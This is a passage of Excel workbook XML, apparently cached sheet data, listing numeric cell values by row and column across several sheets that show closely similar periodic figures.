          <cell r="R7">
            <v>0</v>
          </cell>
        </row>
        <row r="7">
          <cell r="V7">
            <v>0</v>
          </cell>
        </row>
        <row r="7">
          <cell r="Y7">
            <v>0</v>
          </cell>
        </row>
        <row r="10">
          <cell r="P10">
            <v>0</v>
          </cell>
          <cell r="Q10">
            <v>9645.331</v>
          </cell>
          <cell r="R10">
            <v>582.96</v>
          </cell>
        </row>
        <row r="10">
          <cell r="V10">
            <v>807</v>
          </cell>
        </row>
        <row r="10">
          <cell r="Y10">
            <v>8672.671</v>
          </cell>
        </row>
        <row r="17">
          <cell r="D17">
            <v>189966.352</v>
          </cell>
          <cell r="E17">
            <v>6406</v>
          </cell>
        </row>
        <row r="17">
          <cell r="I17">
            <v>6299.52</v>
          </cell>
        </row>
        <row r="17">
          <cell r="L17">
            <v>186922.342</v>
          </cell>
        </row>
        <row r="20">
          <cell r="D20">
            <v>0</v>
          </cell>
        </row>
        <row r="20">
          <cell r="L20">
            <v>0</v>
          </cell>
        </row>
        <row r="21">
          <cell r="D21">
            <v>0</v>
          </cell>
        </row>
        <row r="21">
          <cell r="L21">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="D22">
            <v>83053.31</v>
          </cell>
          <cell r="E22">
            <v>6342</v>
          </cell>
        </row>
        <row r="22">
          <cell r="I22">
            <v>8023.76</v>
          </cell>
        </row>
        <row r="22">
          <cell r="L22">
            <v>78846.91</v>
          </cell>
        </row>
        <row r="23">
          <cell r="D23">
            <v>16639.58</v>
          </cell>
          <cell r="E23">
            <v>0</v>
          </cell>
        </row>
        <row r="23">
          <cell r="I23">
            <v>238.3</v>
          </cell>
        </row>
        <row r="23">
          <cell r="L23">
            <v>14537.64</v>
          </cell>
        </row>
        <row r="24">
          <cell r="D24">
            <v>39834.16</v>
          </cell>
          <cell r="E24">
            <v>2257</v>
          </cell>
        </row>
        <row r="24">
          <cell r="I24">
            <v>5061.26</v>
          </cell>
        </row>
        <row r="24">
          <cell r="L24">
            <v>42067.16</v>
          </cell>
        </row>
        <row r="25">
          <cell r="D25">
            <v>14400.99</v>
          </cell>
          <cell r="E25">
            <v>2641</v>
          </cell>
        </row>
        <row r="25">
          <cell r="I25">
            <v>1115.26</v>
          </cell>
        </row>
        <row r="25">
          <cell r="L25">
            <v>15911.89</v>
          </cell>
        </row>
        <row r="26">
          <cell r="D26">
            <v>0</v>
          </cell>
          <cell r="E26">
            <v>0</v>
          </cell>
        </row>
        <row r="26">
          <cell r="I26">
            <v>0</v>
          </cell>
        </row>
        <row r="26">
          <cell r="L26">
            <v>0</v>
          </cell>
        </row>
        <row r="27">
          <cell r="D27">
            <v>12178.58</v>
          </cell>
          <cell r="E27">
            <v>1444</v>
          </cell>
        </row>
        <row r="27">
          <cell r="I27">
            <v>1608.94</v>
          </cell>
        </row>
        <row r="27">
          <cell r="L27">
            <v>6330.22</v>
          </cell>
        </row>
        <row r="44">
          <cell r="P44">
            <v>0</v>
          </cell>
          <cell r="Q44">
            <v>0</v>
          </cell>
        </row>
        <row r="44">
          <cell r="S44">
            <v>0</v>
          </cell>
          <cell r="T44">
            <v>0</v>
          </cell>
        </row>
        <row r="44">
          <cell r="W44">
            <v>0</v>
          </cell>
          <cell r="X44">
            <v>0</v>
          </cell>
          <cell r="Y44">
            <v>0</v>
          </cell>
        </row>
        <row r="50">
          <cell r="P50">
            <v>0</v>
          </cell>
          <cell r="Q50">
            <v>1231.546</v>
          </cell>
          <cell r="R50">
            <v>461.42</v>
          </cell>
        </row>
        <row r="50">
          <cell r="V50">
            <v>269</v>
          </cell>
        </row>
        <row r="50">
          <cell r="Y50">
            <v>1370.146</v>
          </cell>
        </row>
        <row r="56">
          <cell r="E56">
            <v>0</v>
          </cell>
        </row>
        <row r="56">
          <cell r="I56">
            <v>2096.52</v>
          </cell>
        </row>
        <row r="69">
          <cell r="I69">
            <v>0</v>
          </cell>
        </row>
        <row r="101">
          <cell r="Q101">
            <v>24</v>
          </cell>
          <cell r="R101">
            <v>192</v>
          </cell>
          <cell r="S101">
            <v>5375.319</v>
          </cell>
          <cell r="T101">
            <v>100</v>
          </cell>
          <cell r="U101">
            <v>100</v>
          </cell>
          <cell r="V101">
            <v>65.4887792397661</v>
          </cell>
          <cell r="W101">
            <v>266.916666666667</v>
          </cell>
          <cell r="X101">
            <v>271.807291666667</v>
          </cell>
          <cell r="Y101">
            <v>260.360919975168</v>
          </cell>
        </row>
        <row r="102">
          <cell r="Q102">
            <v>0</v>
          </cell>
          <cell r="R102">
            <v>0</v>
          </cell>
          <cell r="S102">
            <v>2845.199</v>
          </cell>
          <cell r="T102">
            <v>0</v>
          </cell>
          <cell r="U102">
            <v>0</v>
          </cell>
          <cell r="V102">
            <v>34.6637305068226</v>
          </cell>
          <cell r="W102">
            <v>0</v>
          </cell>
          <cell r="X102">
            <v>0</v>
          </cell>
          <cell r="Y102">
            <v>240.280205356462</v>
          </cell>
        </row>
        <row r="104">
          <cell r="Q104">
            <v>24</v>
          </cell>
          <cell r="R104">
            <v>192</v>
          </cell>
          <cell r="S104">
            <v>5352.05</v>
          </cell>
          <cell r="T104">
            <v>100</v>
          </cell>
          <cell r="U104">
            <v>100</v>
          </cell>
          <cell r="V104">
            <v>65.2052875243665</v>
          </cell>
          <cell r="W104">
            <v>28.4733062753614</v>
          </cell>
          <cell r="X104">
            <v>28.3288941690453</v>
          </cell>
          <cell r="Y104">
            <v>26.0325234787226</v>
          </cell>
        </row>
        <row r="105">
          <cell r="Q105">
            <v>0</v>
          </cell>
          <cell r="R105">
            <v>0</v>
          </cell>
          <cell r="S105">
            <v>2804.182</v>
          </cell>
          <cell r="T105">
            <v>0</v>
          </cell>
          <cell r="U105">
            <v>0</v>
          </cell>
          <cell r="V105">
            <v>34.1640107212476</v>
          </cell>
          <cell r="W105">
            <v>0</v>
          </cell>
          <cell r="X105">
            <v>0</v>
          </cell>
          <cell r="Y105">
            <v>29.9342377123697</v>
          </cell>
        </row>
        <row r="107">
          <cell r="Q107">
            <v>11.67</v>
          </cell>
          <cell r="R107">
            <v>88.82</v>
          </cell>
          <cell r="S107">
            <v>2574.25</v>
          </cell>
          <cell r="T107">
            <v>48.625</v>
          </cell>
          <cell r="U107">
            <v>46.2604166666667</v>
          </cell>
          <cell r="V107">
            <v>31.3626949317738</v>
          </cell>
          <cell r="W107">
            <v>136.760925449871</v>
          </cell>
          <cell r="X107">
            <v>127.05471740599</v>
          </cell>
          <cell r="Y107">
            <v>131.763037777994</v>
          </cell>
        </row>
        <row r="108">
          <cell r="Q108">
            <v>11.83</v>
          </cell>
          <cell r="R108">
            <v>90.49</v>
          </cell>
          <cell r="S108">
            <v>2287.34</v>
          </cell>
          <cell r="T108">
            <v>49.2916666666667</v>
          </cell>
          <cell r="U108">
            <v>47.1302083333333</v>
          </cell>
          <cell r="V108">
            <v>27.8672027290448</v>
          </cell>
          <cell r="W108">
            <v>135.841081994928</v>
          </cell>
          <cell r="X108">
            <v>129.030832136148</v>
          </cell>
          <cell r="Y108">
            <v>127.487824284978</v>
          </cell>
        </row>
        <row r="109">
          <cell r="Q109">
            <v>9</v>
          </cell>
          <cell r="R109">
            <v>88.16</v>
          </cell>
          <cell r="S109">
            <v>2883.74999999999</v>
          </cell>
          <cell r="T109">
            <v>37.5</v>
          </cell>
          <cell r="U109">
            <v>45.9166666666667</v>
          </cell>
          <cell r="V109">
            <v>35.1334064327485</v>
          </cell>
          <cell r="W109">
            <v>293.444444444444</v>
          </cell>
          <cell r="X109">
            <v>272.595281306715</v>
          </cell>
          <cell r="Y109">
            <v>271.352232336368</v>
          </cell>
        </row>
        <row r="110">
          <cell r="Q110">
            <v>1.83</v>
          </cell>
          <cell r="R110">
            <v>40.83</v>
          </cell>
          <cell r="S110">
            <v>2804.89</v>
          </cell>
          <cell r="T110">
            <v>7.625</v>
          </cell>
          <cell r="U110">
            <v>21.265625</v>
          </cell>
          <cell r="V110">
            <v>34.1726364522417</v>
          </cell>
          <cell r="W110">
            <v>272.131147540984</v>
          </cell>
          <cell r="X110">
            <v>272.936566250306</v>
          </cell>
          <cell r="Y110">
            <v>268.910367251479</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="11">
        <row r="7">
          <cell r="P7">
            <v>0</v>
          </cell>
          <cell r="Q7">
            <v>0</v>
          </cell>
          <cell r="R7">
            <v>0</v>
          </cell>
        </row>
        <row r="7">
          <cell r="V7">
            <v>0</v>
          </cell>
        </row>
        <row r="7">
          <cell r="Y7">
            <v>0</v>
          </cell>
        </row>
        <row r="10">
          <cell r="P10">
            <v>0</v>
          </cell>
          <cell r="Q10">
            <v>9645.331</v>
          </cell>
          <cell r="R10">
            <v>0</v>
          </cell>
        </row>
        <row r="10">
          <cell r="V10">
            <v>811</v>
          </cell>
        </row>
        <row r="10">
          <cell r="Y10">
            <v>7861.671</v>
          </cell>
        </row>
        <row r="17">
          <cell r="D17">
            <v>189966.352</v>
          </cell>
          <cell r="E17">
            <v>6453</v>
          </cell>
        </row>
        <row r="17">
          <cell r="I17">
            <v>5796.33</v>
          </cell>
        </row>
        <row r="17">
          <cell r="L17">
            <v>187579.012</v>
          </cell>
        </row>
        <row r="20">
          <cell r="D20">
            <v>0</v>
          </cell>
        </row>
        <row r="20">
          <cell r="L20">
            <v>0</v>
          </cell>
        </row>
        <row r="21">
          <cell r="D21">
            <v>0</v>
          </cell>
        </row>
        <row r="21">
          <cell r="L21">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="D22">
            <v>83053.31</v>
          </cell>
          <cell r="E22">
            <v>5713</v>
          </cell>
        </row>
        <row r="22">
          <cell r="I22">
            <v>9109.58</v>
          </cell>
        </row>
        <row r="22">
          <cell r="L22">
            <v>75450.33</v>
          </cell>
        </row>
        <row r="23">
          <cell r="D23">
            <v>16639.58</v>
          </cell>
          <cell r="E23">
            <v>0</v>
          </cell>
        </row>
        <row r="23">
          <cell r="I23">
            <v>429.56</v>
          </cell>
        </row>
        <row r="23">
          <cell r="L23">
            <v>14108.08</v>
          </cell>
        </row>
        <row r="24">
          <cell r="D24">
            <v>39834.16</v>
          </cell>
          <cell r="E24">
            <v>5713</v>
          </cell>
        </row>
        <row r="24">
          <cell r="I24">
            <v>5753.9</v>
          </cell>
        </row>
        <row r="24">
          <cell r="L24">
            <v>42026.26</v>
          </cell>
        </row>
        <row r="25">
          <cell r="D25">
            <v>14400.99</v>
          </cell>
          <cell r="E25">
            <v>0</v>
          </cell>
        </row>
        <row r="25">
          <cell r="I25">
            <v>1351.22</v>
          </cell>
        </row>
        <row r="25">
          <cell r="L25">
            <v>14560.67</v>
          </cell>
        </row>
        <row r="26">
          <cell r="D26">
            <v>0</v>
          </cell>
          <cell r="E26">
            <v>0</v>
          </cell>
        </row>
        <row r="26">
          <cell r="I26">
            <v>0</v>
          </cell>
        </row>
        <row r="26">
          <cell r="L26">
            <v>0</v>
          </cell>
        </row>
        <row r="27">
          <cell r="D27">
            <v>12178.58</v>
          </cell>
          <cell r="E27">
            <v>0</v>
          </cell>
        </row>
        <row r="27">
          <cell r="I27">
            <v>1574.9</v>
          </cell>
        </row>
        <row r="27">
          <cell r="L27">
            <v>4755.32</v>
          </cell>
        </row>
        <row r="44">
          <cell r="P44">
            <v>0</v>
          </cell>
          <cell r="Q44">
            <v>0</v>
          </cell>
        </row>
        <row r="44">
          <cell r="S44">
            <v>0</v>
          </cell>
          <cell r="T44">
            <v>0</v>
          </cell>
        </row>
        <row r="44">
          <cell r="W44">
            <v>0</v>
          </cell>
          <cell r="X44">
            <v>0</v>
          </cell>
          <cell r="Y44">
            <v>0</v>
          </cell>
        </row>
        <row r="50">
          <cell r="P50">
            <v>0</v>
          </cell>
          <cell r="Q50">
            <v>1231.546</v>
          </cell>
          <cell r="R50">
            <v>272.84</v>
          </cell>
        </row>
        <row r="50">
          <cell r="V50">
            <v>256</v>
          </cell>
        </row>
        <row r="50">
          <cell r="Y50">
            <v>1386.986</v>
          </cell>
        </row>
        <row r="56">
          <cell r="E56">
            <v>0</v>
          </cell>
        </row>
        <row r="56">
          <cell r="I56">
            <v>1507.33</v>
          </cell>
        </row>
        <row r="69">
          <cell r="I69">
            <v>0</v>
          </cell>
        </row>
        <row r="101">
          <cell r="Q101">
            <v>24</v>
          </cell>
          <cell r="R101">
            <v>216</v>
          </cell>
          <cell r="S101">
            <v>5399.319</v>
          </cell>
          <cell r="T101">
            <v>100</v>
          </cell>
          <cell r="U101">
            <v>100</v>
          </cell>
          <cell r="V101">
            <v>65.5893950437318</v>
          </cell>
          <cell r="W101">
            <v>268.875</v>
          </cell>
          <cell r="X101">
            <v>271.481481481481</v>
          </cell>
          <cell r="Y101">
            <v>260.398765103525</v>
          </cell>
        </row>
        <row r="102">
          <cell r="Q102">
            <v>0</v>
          </cell>
          <cell r="R102">
            <v>0</v>
          </cell>
          <cell r="S102">
            <v>2845.199</v>
          </cell>
          <cell r="T102">
            <v>0</v>
          </cell>
          <cell r="U102">
            <v>0</v>
          </cell>
          <cell r="V102">
            <v>34.5626700680272</v>
          </cell>
          <cell r="W102">
            <v>0</v>
          </cell>
          <cell r="X102">
            <v>0</v>
          </cell>
          <cell r="Y102">
            <v>240.280205356462</v>
          </cell>
        </row>
        <row r="104">
          <cell r="Q104">
            <v>24</v>
          </cell>
          <cell r="R104">
            <v>216</v>
          </cell>
          <cell r="S104">
            <v>5376.05</v>
          </cell>
          <cell r="T104">
            <v>100</v>
          </cell>
          <cell r="U104">
            <v>100</v>
          </cell>
          <cell r="V104">
            <v>65.3067298347911</v>
          </cell>
          <cell r="W104">
            <v>27.5220827522137</v>
          </cell>
          <cell r="X104">
            <v>28.2401091405184</v>
          </cell>
          <cell r="Y104">
            <v>26.0393707854923</v>
          </cell>
        </row>
        <row r="105">
          <cell r="Q105">
            <v>0</v>
          </cell>
          <cell r="R105">
            <v>0</v>
          </cell>
          <cell r="S105">
            <v>2804.182</v>
          </cell>
          <cell r="T105">
            <v>0</v>
          </cell>
          <cell r="U105">
            <v>0</v>
          </cell>
          <cell r="V105">
            <v>34.064407191448</v>
          </cell>
          <cell r="W105">
            <v>0</v>
          </cell>
          <cell r="X105">
            <v>0</v>
          </cell>
          <cell r="Y105">
            <v>29.9342377123697</v>
          </cell>
        </row>
        <row r="107">
          <cell r="Q107">
            <v>11.83</v>
          </cell>
          <cell r="R107">
            <v>100.65</v>
          </cell>
          <cell r="S107">
            <v>2586.08</v>
          </cell>
          <cell r="T107">
            <v>49.2916666666667</v>
          </cell>
          <cell r="U107">
            <v>46.5972222222222</v>
          </cell>
          <cell r="V107">
            <v>31.4149659863945</v>
          </cell>
          <cell r="W107">
            <v>121.386306001691</v>
          </cell>
          <cell r="X107">
            <v>126.388474913065</v>
          </cell>
          <cell r="Y107">
            <v>131.715569510611</v>
          </cell>
        </row>
        <row r="108">
          <cell r="Q108">
            <v>11.17</v>
          </cell>
          <cell r="R108">
            <v>101.66</v>
          </cell>
          <cell r="S108">
            <v>2298.51</v>
          </cell>
          <cell r="T108">
            <v>46.5416666666667</v>
          </cell>
          <cell r="U108">
            <v>47.0648148148148</v>
          </cell>
          <cell r="V108">
            <v>27.9216472303207</v>
          </cell>
          <cell r="W108">
            <v>134.825425246195</v>
          </cell>
          <cell r="X108">
            <v>129.667519181586</v>
          </cell>
          <cell r="Y108">
            <v>127.523482603948</v>
          </cell>
        </row>
        <row r="109">
          <cell r="Q109">
            <v>0</v>
          </cell>
          <cell r="R109">
            <v>88.16</v>
          </cell>
          <cell r="S109">
            <v>2883.74999999999</v>
          </cell>
          <cell r="T109">
            <v>0</v>
          </cell>
          <cell r="U109">
            <v>40.8148148148148</v>
          </cell>
          <cell r="V109">
            <v>35.0309766763848</v>
          </cell>
          <cell r="W109">
            <v>0</v>
          </cell>
          <cell r="X109">
            <v>272.595281306715</v>
          </cell>
          <cell r="Y109">
            <v>271.352232336368</v>
          </cell>
        </row>
        <row r="110">
          <cell r="Q110">
            <v>11.17</v>
          </cell>
          <cell r="R110">
            <v>52</v>
          </cell>
          <cell r="S110">
            <v>2816.06</v>
          </cell>
          <cell r="T110">
            <v>46.5416666666667</v>
          </cell>
          <cell r="U110">
            <v>24.0740740740741</v>
          </cell>
          <cell r="V110">
            <v>34.2086977648202</v>
          </cell>
          <cell r="W110">
            <v>248.075201432408</v>
          </cell>
          <cell r="X110">
            <v>267.596153846154</v>
          </cell>
          <cell r="Y110">
            <v>268.827723841112</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="12">
        <row r="7">
          <cell r="P7">
            <v>0</v>
          </cell>
          <cell r="Q7">
            <v>0</v>
          </cell>
          <cell r="R7">
            <v>0</v>
          </cell>
        </row>
        <row r="7">
          <cell r="V7">
            <v>0</v>
          </cell>
        </row>
        <row r="7">
          <cell r="Y7">
            <v>0</v>
          </cell>
        </row>
        <row r="10">
          <cell r="P10">
            <v>0</v>
          </cell>
          <cell r="Q10">
            <v>9645.331</v>
          </cell>
          <cell r="R10">
            <v>0</v>
          </cell>
        </row>
        <row r="10">
          <cell r="V10">
            <v>504</v>
          </cell>
        </row>
        <row r="10">
          <cell r="Y10">
            <v>7357.671</v>
          </cell>
        </row>
        <row r="17">
          <cell r="D17">
            <v>189966.352</v>
          </cell>
          <cell r="E17">
            <v>4020</v>
          </cell>
        </row>
        <row r="17">
          <cell r="I17">
            <v>5727.7</v>
          </cell>
        </row>
        <row r="17">
          <cell r="L17">
            <v>185871.312</v>
          </cell>
        </row>
        <row r="20">
          <cell r="D20">
            <v>0</v>
          </cell>
        </row>
        <row r="20">
          <cell r="L20">
            <v>0</v>
          </cell>
        </row>
        <row r="21">
          <cell r="D21">
            <v>0</v>
          </cell>
        </row>
        <row r="21">
          <cell r="L21">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="D22">
            <v>83053.31</v>
          </cell>
          <cell r="E22">
            <v>5665</v>
          </cell>
        </row>
        <row r="22">
          <cell r="I22">
            <v>7007.66</v>
          </cell>
        </row>
        <row r="22">
          <cell r="L22">
            <v>74107.67</v>
          </cell>
        </row>
        <row r="23">
          <cell r="D23">
            <v>16639.58</v>
          </cell>
          <cell r="E23">
            <v>0</v>
          </cell>
        </row>
        <row r="23">
          <cell r="I23">
            <v>227.1</v>
          </cell>
        </row>
        <row r="23">
          <cell r="L23">
            <v>13880.98</v>
          </cell>
        </row>
        <row r="24">
          <cell r="D24">
            <v>39834.16</v>
          </cell>
          <cell r="E24">
            <v>5665</v>
          </cell>
        </row>
        <row r="24">
          <cell r="I24">
            <v>3925.42</v>
          </cell>
        </row>
        <row r="24">
          <cell r="L24">
            <v>43765.84</v>
          </cell>
        </row>
        <row r="25">
          <cell r="D25">
            <v>14400.99</v>
          </cell>
          <cell r="E25">
            <v>0</v>
          </cell>
        </row>
        <row r="25">
          <cell r="I25">
            <v>1523.98</v>
          </cell>
        </row>
        <row r="25">
          <cell r="L25">
            <v>13036.69</v>
          </cell>
        </row>
        <row r="26">
          <cell r="D26">
            <v>0</v>
          </cell>
          <cell r="E26">
            <v>0</v>
          </cell>
        </row>
        <row r="26">
          <cell r="I26">
            <v>0</v>
          </cell>
        </row>
        <row r="26">
          <cell r="L26">
            <v>0</v>
          </cell>
        </row>
        <row r="27">
          <cell r="D27">
            <v>12178.58</v>
          </cell>
          <cell r="E27">
            <v>0</v>
          </cell>
        </row>
        <row r="27">
          <cell r="I27">
            <v>1331.16</v>
          </cell>
        </row>
        <row r="27">
          <cell r="L27">
            <v>3424.16</v>
          </cell>
        </row>
        <row r="44">
          <cell r="P44">
            <v>0</v>
          </cell>
          <cell r="Q44">
            <v>0</v>
          </cell>
        </row>
        <row r="44">
          <cell r="S44">
            <v>0</v>
          </cell>
          <cell r="T44">
            <v>0</v>
          </cell>
        </row>
        <row r="44">
          <cell r="W44">
            <v>0</v>
          </cell>
          <cell r="X44">
            <v>0</v>
          </cell>
          <cell r="Y44">
            <v>0</v>
          </cell>
        </row>
        <row r="50">
          <cell r="P50">
            <v>0</v>
          </cell>
          <cell r="Q50">
            <v>1231.546</v>
          </cell>
          <cell r="R50">
            <v>363.02</v>
          </cell>
        </row>
        <row r="50">
          <cell r="V50">
            <v>254</v>
          </cell>
        </row>
        <row r="50">
          <cell r="Y50">
            <v>1496.006</v>
          </cell>
        </row>
        <row r="56">
          <cell r="E56">
            <v>0</v>
          </cell>
        </row>
        <row r="56">
          <cell r="I56">
            <v>1476.7</v>
          </cell>
        </row>
        <row r="69">
          <cell r="I69">
            <v>0</v>
          </cell>
        </row>
        <row r="101">
          <cell r="Q101">
            <v>14.967</v>
          </cell>
          <cell r="R101">
            <v>230.967</v>
          </cell>
          <cell r="S101">
            <v>5414.286</v>
          </cell>
          <cell r="T101">
            <v>62.3625</v>
          </cell>
          <cell r="U101">
            <v>96.23625</v>
          </cell>
          <cell r="V101">
            <v>65.5800145348837</v>
          </cell>
          <cell r="W101">
            <v>268.590899979956</v>
          </cell>
          <cell r="X101">
            <v>271.294167565063</v>
          </cell>
          <cell r="Y101">
            <v>260.421411059556</v>
          </cell>
        </row>
        <row r="102">
          <cell r="Q102">
            <v>0</v>
          </cell>
          <cell r="R102">
            <v>0</v>
          </cell>
          <cell r="S102">
            <v>2845.199</v>
          </cell>
          <cell r="T102">
            <v>0</v>
          </cell>
          <cell r="U102">
            <v>0</v>
          </cell>
          <cell r="V102">
            <v>34.4621971899225</v>
          </cell>
          <cell r="W102">
            <v>0</v>
          </cell>
          <cell r="X102">
            <v>0</v>
          </cell>
          <cell r="Y102">
            <v>240.280205356462</v>
          </cell>
        </row>
        <row r="104">
          <cell r="Q104">
            <v>14.967</v>
          </cell>
          <cell r="R104">
            <v>230.967</v>
          </cell>
          <cell r="S104">
            <v>5391.017</v>
          </cell>
          <cell r="T104">
            <v>62.3625</v>
          </cell>
          <cell r="U104">
            <v>96.23625</v>
          </cell>
          <cell r="V104">
            <v>65.2981710271318</v>
          </cell>
          <cell r="W104">
            <v>29.4527363183993</v>
          </cell>
          <cell r="X104">
            <v>28.3179061602293</v>
          </cell>
          <cell r="Y104">
            <v>26.0491177026315</v>
          </cell>
        </row>
        <row r="105">
          <cell r="Q105">
            <v>0</v>
          </cell>
          <cell r="R105">
            <v>0</v>
          </cell>
          <cell r="S105">
            <v>2804.182</v>
          </cell>
          <cell r="T105">
            <v>0</v>
          </cell>
          <cell r="U105">
            <v>0</v>
          </cell>
          <cell r="V105">
            <v>33.965382751938</v>
          </cell>
          <cell r="W105">
            <v>0</v>
          </cell>
          <cell r="X105">
            <v>0</v>
          </cell>
          <cell r="Y105">
            <v>29.9342377123697</v>
          </cell>
        </row>
        <row r="107">
          <cell r="Q107">
            <v>9.33</v>
          </cell>
          <cell r="R107">
            <v>109.98</v>
          </cell>
          <cell r="S107">
            <v>2595.41</v>
          </cell>
          <cell r="T107">
            <v>38.875</v>
          </cell>
          <cell r="U107">
            <v>45.825</v>
          </cell>
          <cell r="V107">
            <v>31.4366521317829</v>
          </cell>
          <cell r="W107">
            <v>118.756698821008</v>
          </cell>
          <cell r="X107">
            <v>125.74104382615</v>
          </cell>
          <cell r="Y107">
            <v>131.668984861737</v>
          </cell>
        </row>
        <row r="108">
          <cell r="Q108">
            <v>11.83</v>
          </cell>
          <cell r="R108">
            <v>113.49</v>
          </cell>
          <cell r="S108">
            <v>2310.34</v>
          </cell>
          <cell r="T108">
            <v>49.2916666666667</v>
          </cell>
          <cell r="U108">
            <v>47.2875</v>
          </cell>
          <cell r="V108">
            <v>27.9837693798449</v>
          </cell>
          <cell r="W108">
            <v>139.222316145393</v>
          </cell>
          <cell r="X108">
            <v>130.66349458102</v>
          </cell>
          <cell r="Y108">
            <v>127.583385995135</v>
          </cell>
        </row>
        <row r="109">
          <cell r="Q109">
            <v>0</v>
          </cell>
          <cell r="R109">
            <v>88.16</v>
          </cell>
          <cell r="S109">
            <v>2883.74999999999</v>
          </cell>
          <cell r="T109">
            <v>0</v>
          </cell>
          <cell r="U109">
            <v>36.7333333333333</v>
          </cell>
          <cell r="V109">
            <v>34.9291424418604</v>
          </cell>
          <cell r="W109">
            <v>0</v>
          </cell>
          <cell r="X109">
            <v>272.595281306715</v>
          </cell>
          <cell r="Y109">
            <v>271.352232336368</v>
          </cell>
        </row>
        <row r="110">
          <cell r="Q110">
            <v>11.5</v>
          </cell>
          <cell r="R110">
            <v>63.5</v>
          </cell>
          <cell r="S110">
            <v>2827.56</v>
          </cell>
          <cell r="T110">
            <v>47.9166666666667</v>
          </cell>
          <cell r="U110">
            <v>26.4583333333333</v>
          </cell>
          <cell r="V110">
            <v>34.2485465116279</v>
          </cell>
          <cell r="W110">
            <v>253.04347826087</v>
          </cell>
          <cell r="X110">
            <v>264.96062992126</v>
          </cell>
          <cell r="Y110">
            <v>268.763527564402</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="13">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5933.3</v>
          </cell>
        </row>
        <row r="17">
          <cell r="L17">
            <v>179938.012</v>
          </cell>
        </row>
        <row r="20">
          <cell r="D20">
            <v>0</v>
          </cell>
        </row>
        <row r="20">
          <cell r="L20">
            <v>0</v>
          </cell>
        </row>
        <row r="21">
          <cell r="D21">
            <v>0</v>
          </cell>
        </row>
        <row r="21">
          <cell r="L21">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="D22">
            <v>83053.31</v>
          </cell>
          <cell r="E22">
            <v>5173</v>
          </cell>
        </row>
        <row r="22">
          <cell r="I22">
            <v>8945.62</v>
          </cell>
        </row>
        <row r="22">
          <cell r="L22">
            <v>70335.05</v>
          </cell>
        </row>
        <row r="23">
          <cell r="D23">
            <v>16639.58</v>
          </cell>
          <cell r="E23">
            <v>0</v>
          </cell>
        </row>
        <row r="23">
          <cell r="I23">
            <v>228.12</v>
          </cell>
        </row>
        <row r="23">
          <cell r="L23">
            <v>13652.86</v>
          </cell>
        </row>
        <row r="24">
          <cell r="D24">
            <v>39834.16</v>
          </cell>
          <cell r="E24">
            <v>5173</v>
          </cell>
        </row>
        <row r="24">
          <cell r="I24">
            <v>5596.48</v>
          </cell>
        </row>
        <row r="24">
          <cell r="L24">
            <v>43342.36</v>
          </cell>
        </row>
        <row r="25">
          <cell r="D25">
            <v>14400.99</v>
          </cell>
          <cell r="E25">
            <v>0</v>
          </cell>
        </row>
        <row r="25">
          <cell r="I25">
            <v>1404</v>
          </cell>
        </row>
        <row r="25">
          <cell r="L25">
            <v>11632.69</v>
          </cell>
        </row>
        <row r="26">
          <cell r="D26">
            <v>0</v>
          </cell>
          <cell r="E26">
            <v>0</v>
          </cell>
        </row>
        <row r="26">
          <cell r="I26">
            <v>0</v>
          </cell>
        </row>
        <row r="26">
          <cell r="L26">
            <v>0</v>
          </cell>
        </row>
        <row r="27">
          <cell r="D27">
            <v>12178.58</v>
          </cell>
          <cell r="E27">
            <v>0</v>
          </cell>
        </row>
        <row r="27">
          <cell r="I27">
            <v>1717.02</v>
          </cell>
        </row>
        <row r="27">
          <cell r="L27">
            <v>1707.14</v>
          </cell>
        </row>
        <row r="44">
          <cell r="P44">
            <v>0</v>
          </cell>
          <cell r="Q44">
            <v>0</v>
          </cell>
        </row>
        <row r="44">
          <cell r="S44">
            <v>0</v>
          </cell>
          <cell r="T44">
            <v>0</v>
          </cell>
        </row>
        <row r="44">
          <cell r="W44">
            <v>0</v>
          </cell>
          <cell r="X44">
            <v>0</v>
          </cell>
          <cell r="Y44">
            <v>0</v>
          </cell>
        </row>
        <row r="50">
          <cell r="P50">
            <v>0</v>
          </cell>
          <cell r="Q50">
            <v>1231.546</v>
          </cell>
          <cell r="R50">
            <v>181.72</v>
          </cell>
        </row>
        <row r="50">
          <cell r="V50">
            <v>233</v>
          </cell>
        </row>
        <row r="50">
          <cell r="Y50">
            <v>1444.726</v>
          </cell>
        </row>
        <row r="56">
          <cell r="E56">
            <v>0</v>
          </cell>
        </row>
        <row r="56">
          <cell r="I56">
            <v>2059.3</v>
          </cell>
        </row>
        <row r="69">
          <cell r="I69">
            <v>0</v>
          </cell>
        </row>
        <row r="100">
          <cell r="W100">
            <v>0</v>
          </cell>
        </row>
        <row r="101">
          <cell r="Q101">
            <v>0</v>
          </cell>
          <cell r="R101">
            <v>230.967</v>
          </cell>
          <cell r="S101">
            <v>5414.286</v>
          </cell>
          <cell r="T101">
            <v>0</v>
          </cell>
          <cell r="U101">
            <v>87.4875</v>
          </cell>
          <cell r="V101">
            <v>65.3899275362319</v>
          </cell>
        </row>
        <row r="101">
          <cell r="X101">
            <v>271.294167565063</v>
          </cell>
          <cell r="Y101">
            <v>260.421411059556</v>
          </cell>
        </row>
        <row r="102">
          <cell r="Q102">
            <v>0</v>
          </cell>
          <cell r="R102">
            <v>0</v>
          </cell>
          <cell r="S102">
            <v>2845.199</v>
          </cell>
          <cell r="T102">
            <v>0</v>
          </cell>
          <cell r="U102">
            <v>0</v>
          </cell>
          <cell r="V102">
            <v>34.362306763285</v>
          </cell>
          <cell r="W102">
            <v>0</v>
          </cell>
          <cell r="X102">
            <v>0</v>
          </cell>
          <cell r="Y102">
            <v>240.280205356462</v>
          </cell>
        </row>
        <row r="104">
          <cell r="Q104">
            <v>0</v>
          </cell>
          <cell r="R104">
            <v>230.967</v>
          </cell>
          <cell r="S104">
            <v>5391.017</v>
          </cell>
          <cell r="T104">
            <v>0</v>
          </cell>
          <cell r="U104">
            <v>87.4875</v>
          </cell>
          <cell r="V104">
            <v>65.1089009661836</v>
          </cell>
          <cell r="W104">
            <v>0</v>
          </cell>
          <cell r="X104">
            <v>28.3179061602293</v>
          </cell>
          <cell r="Y104">
            <v>26.0491177026315</v>
          </cell>
        </row>
        <row r="105">
          <cell r="Q105">
            <v>0</v>
          </cell>
          <cell r="R105">
            <v>0</v>
